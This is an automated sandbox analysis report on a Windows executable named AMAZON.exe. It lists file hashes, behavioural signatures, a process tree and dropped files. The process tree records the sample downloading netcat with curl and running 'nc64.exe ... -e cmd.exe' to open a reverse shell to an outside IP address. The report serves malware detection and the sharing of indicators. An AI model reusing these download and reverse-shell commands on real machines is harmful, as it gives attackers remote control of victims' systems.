Overview

overview

7

Static

static

3

AMAZON.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16/03/2024, 03:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    AMAZON.exe

  • Size

    6.9MB

  • MD5

    212add35db896389ea8bf5311efdb7d5

  • SHA1

    621729e6b12ce455b4453048ecfe235ec662af69

  • SHA256

    644fd7573f72e1b904a7b2ba5c5534af6fe414345fe70b0411213018f6ebfba5

  • SHA512

    70dbaf73886bb53a67917fd9f13cd974da9caef7c45e4b4fec4e946cff251262da288bcc96c07ed7fe04e64f3bee3ee1e931c3cd892e98dba1909dcf2ec532fa

  • SSDEEP

    98304:ZnbIMfow2LmvNA1h9eT393YigJhH0yqTu/NWPdHdda9D4oREKYTA+qHP1w:ZnbIT2A1HeT39Iig+c0/aFFriADv

Score
7/10
persistence

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Modifies system executable filetype association 2 TTPs 2 IoCs
    persistence
  • Registers COM server for autorun 1 TTPs 64 IoCs
    persistence
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\AMAZON.exe
    "C:\Users\Admin\AppData\Local\Temp\AMAZON.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:452
    • C:\Users\Admin\AppData\Local\Temp\AMAZON.exe
      "C:\Users\Admin\AppData\Local\Temp\AMAZON.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4228
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c curl https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip -o netcat.zip
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1104
        • C:\Windows\system32\curl.exe
          curl https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip -o netcat.zip
          4⤵
            PID:3188
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c nc64.exe 192.168.238.130 169 -e cmd.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3344
          • C:\Users\Admin\AppData\Local\Temp\netcat-1.11\nc64.exe
            nc64.exe 192.168.238.130 169 -e cmd.exe
            4⤵
            • Executes dropped EXE
            PID:4892
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:3652
      • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
        "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"
        1⤵
        • Modifies system executable filetype association
        • Registers COM server for autorun
        • Checks processor information in registry
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of SetWindowsHookEx
        PID:5068

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\settings\PreSignInSettingsConfig.json
        Filesize

        63KB

        MD5

        e516a60bc980095e8d156b1a99ab5eee

        SHA1

        238e243ffc12d4e012fd020c9822703109b987f6

        SHA256

        543796a1b343b4ebc0285d89cb8eb70667ac7b513da37495e38003704e9d88d7

        SHA512

        9b51e99ba20e9da56d1acc24a1cf9f9c9dbdeb742bec034e0ff2bc179a60f4aff249f40344f9ddd43229dcdefa1041940f65afb336d46c175ffeff725c638d58

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\RGI21ZAG\update100[1].xml
        Filesize

        726B

        MD5

        53244e542ddf6d280a2b03e28f0646b7

        SHA1

        d9925f810a95880c92974549deead18d56f19c37

        SHA256

        36a6bd38a8a6f5a75b73caffae5ae66dfabcaefd83da65b493fa881ea8a64e7d

        SHA512

        4aa71d92ea2c46df86565d97aac75395371d3e17877ab252a297b84dca2ab251d50aaffc62eab9961f0df48de6f12be04a1f4a2cbde75b9ae7bcce6eb5450c62

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI4522\VCRUNTIME140.dll
        Filesize

        116KB

        MD5

        be8dbe2dc77ebe7f88f910c61aec691a

        SHA1

        a19f08bb2b1c1de5bb61daf9f2304531321e0e40

        SHA256

        4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

        SHA512

        0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI4522\_bz2.pyd
        Filesize

        82KB

        MD5

        37eace4b806b32f829de08db3803b707

        SHA1

        8a4e2bb2d04685856d1de95b00f3ffc6ea1e76b9

        SHA256

        1be51ef2b5acbe490217aa1ff12618d24b95df6136c6844714b9ca997b4c7f9b

        SHA512

        1591a263de16373ee84594943a0993721b1e1a2f56140d348a646347a8e9760930df4f632adcee9c9870f9c20d7818a3a8c61b956723bf94777e0b7fb7689b2d

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI4522\_decimal.pyd
        Filesize

        247KB

        MD5

        e4e032221aca4033f9d730f19dc3b21a

        SHA1

        584a3b4bc26a323ce268a64aad90c746731f9a48

        SHA256

        23bdd07b84d2dbcb077624d6dcbfc66ab13a9ef5f9eebe31dc0ffece21b9e50c

        SHA512

        4a350ba9e8481b66e7047c9e6c68e6729f8074a29ef803ed8452c04d6d61f8f70300d5788c4c3164b0c8fb63e7c9715236c0952c3166b606e1c7d7fff36b7c4c

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI4522\_hashlib.pyd
        Filesize

        63KB

        MD5

        ba682dfcdd600a4bb43a51a0d696a64c

        SHA1

        df85ad909e9641f8fcaa0f8f5622c88d904e9e20

        SHA256

        2ad55e11bddb5b65cdf6e9e126d82a3b64551f7ad9d4cbf74a1058fd7e5993bd

        SHA512

        79c607e58881d3c3dfb83886fe7aa4cddb5221c50499d33fe21e1efb0ffa1fd0d3f52cbe97b16b04fbe2b067d6eb5997ac66dec9d2a160d3cb6d44ffca0f5636

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI4522\_lzma.pyd
        Filesize

        155KB

        MD5

        3273720ddf2c5b75b072a1fb13476751

        SHA1

        5fe0a4f98e471eb801a57b8c987f0feb1781ca8b

        SHA256

        663f1087c2ed664c5995a3ffa64546d2e33a0fce8a9121b48cc7c056b74a2948

        SHA512

        919dbbfcc2f5913655d77f6c4ae9baa3a300153a5821dc9f23e0aceb89f69cb9fb86d6ce8f367b9301e0f7b6027e6b2f0911a2e73255ab5150a74b862f8af18e

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI4522\_socket.pyd
        Filesize

        77KB

        MD5

        485d998a2de412206f04fa028fe6ba90

        SHA1

        286e29d4f91a46171ba1e3c8229e6de94b499f1d

        SHA256

        8f9ede5044643413c3b072cd31a565956498ca07cdd17fb6a04483d388fdad76

        SHA512

        68591522e9188f06ff81cd2b3506b40b9ad508d6e34f0111819bf5eff47ed9adf95ebfae5d05b685c4f53b186d15cc45e0d831d96be926f7a5762ee2f1341f1f

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI4522\base_library.zip
        Filesize

        1.4MB

        MD5

        d67807911e3e5740375e56bfb71a0f82

        SHA1

        232f1c78c0da9ccab1be67a0b5124faa7d36c0d6

        SHA256

        9095b218411ec46d59aa5e7b174aea7e628c8cd364891f685944a4f8ab975452

        SHA512

        22a9592be7e60a78cc06ed8b597bd768336738aec5fbcfc6697eeab59cc8f26964ae46234fa862d18f922df5107ffee8578448911ac72eb9d3c344d268595823

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI4522\libcrypto-3.dll
        Filesize

        5.0MB

        MD5

        e547cf6d296a88f5b1c352c116df7c0c

        SHA1

        cafa14e0367f7c13ad140fd556f10f320a039783

        SHA256

        05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de

        SHA512

        9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI4522\python311.dll
        Filesize

        5.5MB

        MD5

        d06da79bfd21bb355dc3e20e17d3776c

        SHA1

        610712e77f80d2507ffe85129bfeb1ff72fa38bf

        SHA256

        2835e0f24fb13ef019608b13817f3acf8735fbc5f786d00501c4a151226bdff1

        SHA512

        e4dd839c18c95b847b813ffd0ca81823048d9b427e5dcf05f4fbe0d77b8f7c8a4bd1c67c106402cd1975bc20a8ec1406a38ad4764ab466ef03cb7eb1f431c38a

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI4522\select.pyd
        Filesize

        29KB

        MD5

        e07ae2f7f28305b81adfd256716ae8c6

        SHA1

        9222cd34c14a116e7b9b70a82f72fc523ef2b2f6

        SHA256

        fb06ac13f8b444c3f7ae5d2af15710a4e60a126c3c61a1f1e1683f05f685626c

        SHA512

        acb143194ca465936a48366265ae3e11a2256aeae333c576c8c74f8ed9b60987daff81647aef74e236b30687a28bc7e3aa21c6aedbfa47b1501658a2bfd117b4

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI4522\unicodedata.pyd
        Filesize

        1.1MB

        MD5

        5cc36a5de45a2c16035ade016b4348eb

        SHA1

        35b159110e284b83b7065d2cff0b5ef4ccfa7bf1

        SHA256

        f28ac3e3ad02f9e1d8b22df15fa30b2190b080261a9adc6855248548cd870d20

        SHA512

        9cccbf81e80c32976b7b2e0e3978e8f7350cce542356131b24ebab34b256efd44643d41ee4b2994b9152c2e5af302aa182a1889c99605140f47494a501ef46c1

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\netcat-1.11\nc64.exe
        Filesize

        42KB

        MD5

        470797a25a6b21d0a46f82968fd6a184

        SHA1

        dac7867ee642a65262e153147552befb0b45b036

        SHA256

        ce80b839411b1541d09b0ede82f1477b516da0c60760079f46ba4443e1a6f419

        SHA512

        4bf0a43c55ce86b79b87fca3bc48927f9d049c3d67131f5fb04bd9a5c56bde79a46013be8b17a5e7ac7fcc1c0c6ba24166a5627e75c2573117a7039c7724a63e

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\netcat.zip
        Filesize

        107KB

        MD5

        9e823aab12266de1e7c2fd729696946c

        SHA1

        55095a14c47cc46c80130196660175188d9835a2

        SHA256

        49e16999db7bb33a58f949ef605020c52de4722582e83871481e7ad80ee19b86

        SHA512

        044c610b6e0a6a23f891c282b554a1844ca8c4cc43805b3cf15a86d3f6f20de97bcc82b32d6cd35803a4fa5ca0190fa41c92a1cc4bba28afd7fa0e75d341e4f2

        Download Submit

      • memory/4892-42-0x0000000000400000-0x0000000000410000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4892-44-0x0000000000400000-0x0000000000410000-memory.dmp

        Filesize

        64KB

        Download